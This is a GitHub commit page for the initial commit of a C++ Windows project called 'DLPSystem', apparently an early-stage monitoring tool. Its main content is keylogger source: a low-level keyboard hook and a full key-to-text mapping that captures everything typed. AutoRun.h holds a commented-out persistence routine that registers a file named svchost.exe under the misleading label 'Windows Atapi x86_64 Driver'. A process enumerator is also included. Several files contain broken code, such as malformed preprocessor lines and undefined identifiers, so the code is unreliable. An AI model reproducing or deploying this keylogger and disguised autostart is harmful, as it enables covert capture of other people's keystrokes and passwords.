Initial commit

shashinma · Nov 29, 2022 · 98111cf · 98111cf
1 parent 955632c
commit 98111cf
Show file tree

Hide file tree

Showing 38 changed files with 3,185 additions and 0 deletions.
diff --git a/CMakeLists.txt b/CMakeLists.txt
@@ -0,0 +1,6 @@
+cmake_minimum_required(VERSION 3.23)
+project(DLPSystem)
+
+set(CMAKE_CXX_STANDARD 20)
+
+add_executable(DLPSystem Source/Modules/Keylogger.cpp Source/Secure/ActivitySecure.cpp Source/Core/Core.cpp Source/Controllers/ThreadsController.cpp Source/Configuration/KeyValue.cpp Source/Configuration/KeyValue.h main.cpp Source/Modules/Keylogger.h Source/Controllers/ThreadsController.h Source/Core/Core.h Source/Modules/AutoRun.cpp Source/Modules/AutoRun.h Source/Modules/TaskManagerAnalyzer.cpp Source/Modules/TaskManagerAnalyzer.h Source/Secure/ActivitySecure.h)
diff --git a/Logs/myFile.txt b/Logs/myFile.txt
diff --git a/Source/Configuration/KeyValue.cpp b/Source/Configuration/KeyValue.cpp
@@ -0,0 +1,141 @@
+#include "KeyValue.h"
+#include "fstream"
+
+std::string path = "../Logs/testlog.log";
+
+void Write(std::string data) {
+    std::cout << data;
+}
+
+VOID WriteToFile(std::string data)
+{
+    // Реализовать запись в файл
+    // Сделать таймкоды
+}
+
+bool capital = false;
+bool numLock = false;
+bool shift = false;
+
+bool shiftStatement(bool wParam) {
+    return shift = wParam;
+}
+
+void keyValueChecker(PKBDLLHOOKSTRUCT keystroke, WPARAM wParam){
+//    WORD lang = languageChecker();
+    switch (keystroke->vkCode) {
+        case 0x41: { Write(capital ? (shift ? "a" : "A") : (shift ? "A" : "a")); break; }
+        case 0x42: { Write(capital ? (shift ? "b" : "B") : (shift ? "B" : "b")); break; }
+        case 0x43: { Write(capital ? (shift ? "c" : "C") : (shift ? "C" : "c")); break; }
+        case 0x44: { Write(capital ? (shift ? "d" : "D") : (shift ? "D" : "d")); break; }
+        case 0x45: { Write(capital ? (shift ? "e" : "E") : (shift ? "E" : "e")); break; }
+        case 0x46: { Write(capital ? (shift ? "f" : "F") : (shift ? "F" : "f")); break; }
+        case 0x47: { Write(capital ? (shift ? "g" : "G") : (shift ? "G" : "g")); break; }
+        case 0x48: { Write(capital ? (shift ? "h" : "H") : (shift ? "H" : "h")); break; }
+        case 0x49: { Write(capital ? (shift ? "i" : "I") : (shift ? "I" : "i")); break; }
+        case 0x4A: { Write(capital ? (shift ? "j" : "J") : (shift ? "J" : "j")); break; }
+        case 0x4B: { Write(capital ? (shift ? "k" : "K") : (shift ? "K" : "k")); break; }
+        case 0x4C: { Write(capital ? (shift ? "l" : "L") : (shift ? "L" : "l")); break; }
+        case 0x4D: { Write(capital ? (shift ? "m" : "M") : (shift ? "M" : "m")); break; }
+        case 0x4E: { Write(capital ? (shift ? "n" : "N") : (shift ? "N" : "n")); break; }
+        case 0x4F: { Write(capital ? (shift ? "o" : "O") : (shift ? "O" : "o")); break; }
+        case 0x50: { Write(capital ? (shift ? "p" : "P") : (shift ? "P" : "p")); break; }
+        case 0x51: { Write(capital ? (shift ? "q" : "Q") : (shift ? "Q" : "q")); break; }
+        case 0x52: { Write(capital ? (shift ? "r" : "R") : (shift ? "R" : "r")); break; }
+        case 0x53: { Write(capital ? (shift ? "s" : "S") : (shift ? "S" : "s")); break; }
+        case 0x54: { Write(capital ? (shift ? "t" : "T") : (shift ? "T" : "t")); break; }
+        case 0x55: { Write(capital ? (shift ? "u" : "U") : (shift ? "U" : "u")); break; }
+        case 0x56: { Write(capital ? (shift ? "v" : "V") : (shift ? "V" : "v")); break; }
+        case 0x57: { Write(capital ? (shift ? "w" : "W") : (shift ? "W" : "w")); break; }
+        case 0x58: { Write(capital ? (shift ? "x" : "X") : (shift ? "X" : "x")); break; }
+        case 0x59: { Write(capital ? (shift ? "y" : "Y") : (shift ? "Y" : "y")); break; }
+        case 0x5A: { Write(capital ? (shift ? "z" : "Z") : (shift ? "Z" : "z")); break; }
+        case 0x30: { Write(shift ? ")" : "0"); break; }
+        case 0x31: { Write(shift ? "!" : "1"); break; }
+        case 0x32: { Write(shift ? "@" : "2"); break; }
+        case 0x33: { Write(shift ? "#" : "3"); break; }
+        case 0x34: { Write(shift ? "$" : "4"); break; }
+        case 0x35: { Write(shift ? "%" : "5"); break; }
+        case 0x36: { Write(shift ? "^" : "6"); break; }
+        case 0x37: { Write(shift ? "&" : "7"); break; }
+        case 0x38: { Write(shift ? "*" : "8"); break; }
+        case 0x39: { Write(shift ? "(" : "9"); break; }
+        case VK_OEM_1: { Write(shift ? ":"  : ";" ); break; }
+        case VK_OEM_2: { Write(shift ? "?"  : "/" ); break; }
+        case VK_OEM_3: { Write(shift ? "~"  : "`" ); break; }
+        case VK_OEM_4: { Write(shift ? "{"  : "[" ); break; }
+        case VK_OEM_5: { Write(shift ? "|"  : "\\"); break; }
+        case VK_OEM_6: { Write(shift ? "}"  : "]" ); break; }
+        case VK_OEM_7: { Write(shift ? "\"" : "'" ); break; }
+        case VK_OEM_PLUS:   { Write(shift ? "+" : "="); break; }
+        case VK_OEM_COMMA:  { Write(shift ? "<" : ","); break; }
+        case VK_OEM_MINUS:  { Write(shift ? "_" : "-"); break; }
+        case VK_OEM_PERIOD: { Write(shift ? ">" : "."); break; }
+        case VK_SPACE:    { Write(" "); break; }
+        case VK_NUMPAD0:  { Write("0"); break; }
+        case VK_NUMPAD1:  { Write("1"); break; }
+        case VK_NUMPAD2:  { Write("2"); break; }
+        case VK_NUMPAD3:  { Write("3"); break; }
+        case VK_NUMPAD4:  { Write("4"); break; }
+        case VK_NUMPAD5:  { Write("5"); break; }
+        case VK_NUMPAD6:  { Write("6"); break; }
+        case VK_NUMPAD7:  { Write("7"); break; }
+        case VK_NUMPAD8:  { Write("8"); break; }
+        case VK_NUMPAD9:  { Write("9"); break; }
+        case VK_MULTIPLY: { Write("*"); break; }
+        case VK_ADD:      { Write("+"); break; }
+        case VK_SUBTRACT: { Write("-"); break; }
+        case VK_DECIMAL:  { Write(","); break; }
+        case VK_DIVIDE:   { Write("/"); break; }
+        case VK_BACK:     { Write(" [BACKSPACE] "); break; }
+        case VK_TAB:      { Write(" [TAB] "      ); break; }
+        case VK_RETURN:   { Write(" [ENTER] \n"    ); break; }
+        case VK_MENU:     { Write(" [ALT] "      ); break; }
+        case VK_ESCAPE:   { Write(" [ESC] "      ); break; }
+        case VK_PRIOR:    { Write(" [PG UP] "    ); break; }
+        case VK_NEXT:     { Write(" [PG DN] "    ); break; }
+        case VK_END:      { Write(" [END]"      ); break; }
+        case VK_HOME:     { Write(" [HOME]"     ); break; }
+        case VK_LEFT:     { Write(" [LEFT] "     ); break; }
+        case VK_UP:       { Write(" [UP] "    ); break; }
+        case VK_RIGHT:    { Write(" [RIGHT] "    ); break; }
+        case VK_DOWN:     { Write(" [DOWN] "     ); break; }
+        case VK_PRINT:    { Write(" [PRINT] "    ); break; }
+        case VK_SNAPSHOT: { Write(" [PRT SC] "   ); break; }
+        case VK_INSERT:   { Write(" [INSERT] "   ); break; }
+        case VK_DELETE:   { Write(" [DELETE] "   ); break; }
+        case VK_LWIN:     { Write(" [WIN KEY] "  ); break; }
+        case VK_RWIN:     { Write(" [WIN KEY] "  ); break; }
+        case VK_CAPITAL:  { capital = !capital;   break; }
+        case VK_NUMLOCK:  { numLock = !numLock;   break; }
+        case VK_LCONTROL: { if (wParam == WM_KEYDOWN) { Write(" [CTRL] "); } break; }
+        case VK_RCONTROL: { if (wParam == WM_KEYDOWN) { Write(" [CTRL] "); } break; }
+        case VK_F1:  { Write(" [F1] " ); break; }
+        case VK_F2:  { Write(" [F2] " ); break; }
+        case VK_F3:  { Write(" [F3] " ); break; }
+        case VK_F4:  { Write(" [F4] " ); break; }
+        case VK_F5:  { Write(" [F5] " ); break; }
+        case VK_F6:  { Write(" [F6] " ); break; }
+        case VK_F7:  { Write(" [F7] " ); break; }
+        case VK_F8:  { Write(" [F8] " ); break; }
+        case VK_F9:  { Write(" [F9] " ); break; }
+        case VK_F10: { Write(" [F10] "); break; }
+        case VK_F11: { Write(" [F11] "); break; }
+        case VK_F12: { Write(" [F12] "); break; }
+
+        default: {
+            DWORD dWord = keystroke->scanCode << 16;
+            dWord += keystroke->flags << 24;
+            char otherKey[16] = "";
+            if (GetKeyNameTextA(dWord, otherKey, sizeof(otherKey)) != 0) {
+                Write(otherKey);
+            }
+        }
+    }
+}
+
+//if (languageChecker() == ENG){
+//Write(capital ? (shift ? "a" : "A") : (shift ? "A" : "a")); break;
+//}
+//else if (languageChecker() == RUS) {
+//Write(capital ? (shift ? "ф" : "Ф") : (shift ? "Ф" : "ф")); break;
diff --git a/Source/Configuration/KeyValue.h b/Source/Configuration/KeyValue.h
@@ -0,0 +1,14 @@
+#ifndef DLPSYSTEM_KEYVALUE_H
+#define DLPSYSTEM_KEYVALUE_H
+
+#include <Windows.h>
+#include <iostream>
+
+
+#define RUS 0x0419
+#define ENG 0x0409
+
+bool shiftStatement(bool wParam);
+void keyValueChecker(PKBDLLHOOKSTRUCT keystroke, WPARAM wParam);
+
+#endif //DLPSYSTEM_KEYVALUE_H
diff --git a/Source/Controllers/ThreadsController.cpp b/Source/Controllers/ThreadsController.cpp
@@ -0,0 +1,2 @@
+#include "ThreadsController.h"
+
diff --git a/Source/Controllers/ThreadsController.h b/Source/Controllers/ThreadsController.h
@@ -0,0 +1,8 @@
+#ifndef DLPSYSTEM_THREADSCONTROLLER_H
+#define DLPSYSTEM_THREADSCONTROLLER_H
+
+#include "../Modules/Keylogger.h" // <Windows.h>, <iostream>
+#include "../Modules/TaskManagerAnalyzer.h"
+
+
+endif //DLPSYSTEM_THREADSCONTROLLER_H
diff --git a/Source/Core/Core.cpp b/Source/Core/Core.cpp
@@ -0,0 +1 @@
+#include "Core.h"
diff --git a/Source/Core/Core.h b/Source/Core/Core.h
@@ -0,0 +1,9 @@
+#ifndef DLPSYSTEM_CORE_H
+#define DLPSYSTEM_CORE_H
+
+#include "../Modules/AutoRun.h"
+#include "../Secure/ActivitySecure.h"
+
+#include "../Controllers/ThreadsController.h"
+
+endif //DLPSYSTEM_CORE_H
diff --git a/Source/Modules/AutoRun.cpp b/Source/Modules/AutoRun.cpp
@@ -0,0 +1 @@
+#include "AutoRun.h"
diff --git a/Source/Modules/AutoRun.h b/Source/Modules/AutoRun.h
@@ -0,0 +1,21 @@
+#ifndef DLPSYSTEM_AUTORUN_H
+#define DLPSYSTEM_AUTORUN_H
+
+
+class AutoRun {
+
+};
+
+//void AutoStart()
+//{
+//    char Driver[MAX_PATH];
+//    HKEY hKey;
+//    string ff_path = userlc + "svchost.exe";
+//    strcpy(Driver,ff_path.c_str());
+//    RegOpenKeyExA(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey);
+//    RegSetValueExA(hKey, "Windows Atapi x86_64 Driver", 0, REG_SZ, (const unsigned char *)Driver, MAX_PATH);
+//    RegCloseKey(hKey);
+//}
+
+
+#endif //DLPSYSTEM_AUTORUN_H
diff --git a/Source/Modules/Keylogger.cpp b/Source/Modules/Keylogger.cpp
@@ -0,0 +1,24 @@
+#include "Keylogger.h" // Windows.h, iostream
+
+// Дописать сюда функции очистки памяти из длинного видоса (2 часть)
+
+LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam){
+    if (nCode == HC_ACTION) {
+        PKBDLLHOOKSTRUCT keystroke = reinterpret_cast<PKBDLLHOOKSTRUCT>(lParam);
+        if (keystroke->vkCode == VK_LSHIFT || keystroke->vkCode == VK_RSHIFT) {
+            shiftStatement(wParam == WM_KEYDOWN ? true : false); // delete ?
+//            shift = wParam == WM_KEYDOWN ? true : false; // original
+
+        }
+        else if (wParam == WM_SYSKEYDOWN || wParam == WM_KEYDOWN) {
+            keyValueChecker(keystroke, wParam);
+        }
+    }
+    return CallNextHookEx(NULL, nCode, wParam, lParam);
+}
+
+void runKeylogger() {
+    SetWindowsHookEx(WH_KEYBOARD_LL, keyboardHookProc, NULL, 0);
+    //Убрать сообщение и сдедлать бесконечный цикл
+    MessageBox(NULL, TEXT("Press OK"), TEXT("Information"), MB_OK);
+}
diff --git a/Source/Modules/Keylogger.h b/Source/Modules/Keylogger.h
@@ -0,0 +1,9 @@
+#ifndef DLPSYSTEM_KEYLOGGER_H
+#define DLPSYSTEM_KEYLOGGER_H
+
+//#define PATH ""
+#include "../Configuration/KeyValue.h" // <Windows.h>, <iostream>
+
+void runKeylogger();
+
+#endif //DLPSYSTEM_KEYLOGGER_H
diff --git a/Source/Modules/TaskManagerAnalyzer.cpp b/Source/Modules/TaskManagerAnalyzer.cpp
@@ -0,0 +1,135 @@
+#include "TaskManagerAnalyzer.h"
+
+std::list<std::string> trustedApps();
+
+void trustedList(){
+
+}
+
+class SmartHandle{
+public:
+    SmartHandle(HANDLE handle){
+        _handle = handle;
+    }
+    ~SmartHandle(){
+        if(_handle){
+            CloseHandle(_handle);
+        }
+    }
+
+    operator bool(){
+        return _handle != NULL;
+    }
+
+    operator HANDLE(){
+        return _handle;
+    }
+
+    HANDLE handle(){
+        return _handle;
+    }
+private:
+    HANDLE _handle = NULL;
+};
+
+struct ProcessInfo {
+    PROCESSENTRY32 pe;
+    std::vector<THREADENTRY32> threads;
+};
+
+int startTaskManagerAnalyzer(){
+    SmartHandle processSnap(CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0));
+    SmartHandle threadSnap(CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0));
+
+    if (!processSnap || !threadSnap){
+        return 1;
+    }
+
+    std::vector<ProcessInfo> processInfos;
+    std::vector<THREADENTRY32> threads;
+
+    THREADENTRY32 te{ sizeof(THREADENTRY32) };
+    if (Thread32First(threadSnap, &te) == FALSE){
+        return 2;
+    }
+    do{
+        threads.push_back(te);
+    } while (Thread32Next(threadSnap, &te));
+
+    PROCESSENTRY32 pe{ sizeof(PROCESSENTRY32) };
+    if (Process32First(processSnap, &pe) == FALSE){
+        return 2;
+    }
+    do{
+        std::vector<THREADENTRY32> subThreads;
+        for (const auto &thread : threads){
+            if (thread.th32OwnerProcessID == pe.th32ProcessID){
+                subThreads.push_back(thread);
+            }
+        }
+        processInfos.push_back(ProcessInfo{ pe, subThreads });
+
+    } while (Process32Next(processSnap, &pe));
+
+    for (const auto &processInfo : processInfos){
+        tcout << processInfo.pe.szExeFile << std::endl;
+        for (const auto &thread : processInfo.threads){
+            tcout << "    " << thread.th32ThreadID << std::endl;
+        }
+
+        if (!(std::find(trustedList, pe.szExeFile))) std::cout << "error"; // -> logger -> core
+    }
+    return 0;
+}
+
+int startTaskManagerAnalyzerTest()
+{
+    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+    PROCESSENTRY32 pe;  //хранит информацию о найденом процессе
+    if (Process32First(hSnapshot, &pe)) //Поиск первого процесса в снимке
+    {
+        do
+        {
+            if (!pe.th32ProcessID) continue;    // Пропуск [System process]
+            //Получаем дескриптор процесса
+            HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pe.th32ProcessID);
+            char cPriority[18];
+            switch (GetPriorityClass(hProcess)) //Получае приоритет процесса
+            {
+                case HIGH_PRIORITY_CLASS:
+                    strcpy(cPriority, "HIGH");
+                    break;
+                case IDLE_PRIORITY_CLASS:
+                    strcpy(cPriority, "LOW");
+                    break;
+                case NORMAL_PRIORITY_CLASS:
+                    strcpy(cPriority, "MIDDLE");
+                    break;
+                case REALTIME_PRIORITY_CLASS:
+                    strcpy(cPriority, "REALTIME");
+                    break;
+                default:
+                    strcpy(cPriority, "HIGH");
+            }
+            CloseHandle(hProcess);
+            //Выводим информацию о процессе
+            printf("%25s%6d%18d%18s%12d\n", pe.szExeFile, pe.th32ProcessID,
+                                            pe.cntThreads, cPriority, pe.th32ParentProcessID);
+        }
+        while (Process32Next(hSnapshot, &pe));  //Поиск следущего процесса в снимке
+    }
+    else printf("error -1");
+    CloseHandle(hSnapshot);
+
+    system("PAUSE");
+    return 0;
+}
+
+/* Закрытие процесса
+HANDLE  hProcess = OpenProcess(SYNCHRONIZE, TRUE, inProcessID);
+
+if (NULL != hProcess)
+{
+WaitForSingleObject(hProcess,INFINITE);
+}
+*/